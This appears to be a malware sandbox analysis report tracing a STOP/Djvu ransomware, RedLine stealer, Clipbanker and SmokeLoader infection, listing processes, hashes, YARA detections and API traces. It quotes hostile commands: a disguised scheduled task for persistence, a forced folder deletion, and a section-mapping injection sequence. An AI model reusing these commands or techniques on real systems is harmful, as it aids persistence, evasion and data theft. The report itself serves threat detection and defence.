Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	15:29:48
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:29:49
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:29:57
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe"
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:29:57
Start date:	25/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0xf30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	15:29:57
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:29:58
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.2266884728.00000000049E4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	15:29:58
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000020.00000002.2341106813.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.2341456493.00000000008DC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 87%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	15:29:59
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart
Imagebase:	0x400000
File size:	751'104 bytes
MD5 hash:	3EEDC2AE680453B8CA3B23FD15F529A7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	15:30:01
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Roaming\rujtcgu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rujtcgu
Imagebase:	0x400000
File size:	240'128 bytes
MD5 hash:	A25AC46E5BEA920465D1838177782E5B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	15:30:07
Start date:	25/05/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Target ID:	36
Start time:	15:30:07
Start date:	25/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0xf30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:30:07
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	15:30:31
Start date:	25/05/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2580 -s 10876
Imagebase:	0x7ff6e8e00000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:30:34
Start date:	25/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	15:30:37
Start date:	25/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIJEBGDAFHI" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:30:38
Start date:	25/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	51.9%
Signature Coverage:	42.3%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Executed Functions

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

Function 02E52564 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E5258C
Module32First.KERNEL32(00000000,00000224), ref: 02E525AC

Memory Dump Source

Source File: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e4b000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 362734425a780527dd53054b1ce57eb59919fa54082e502f4eb05afd0aa5ecbf
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 41F0F6355507216FD7203BF4A89DB6E72E8FF48229F105128FF43910C0DB70E8054A62

Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1708711137.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

Function 02E2003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E2024D

Strings

cess, xrefs: 02E2018D
kernel32.dll, xrefs: 02E2008F, 02E20095

Memory Dump Source

Source File: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e20000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
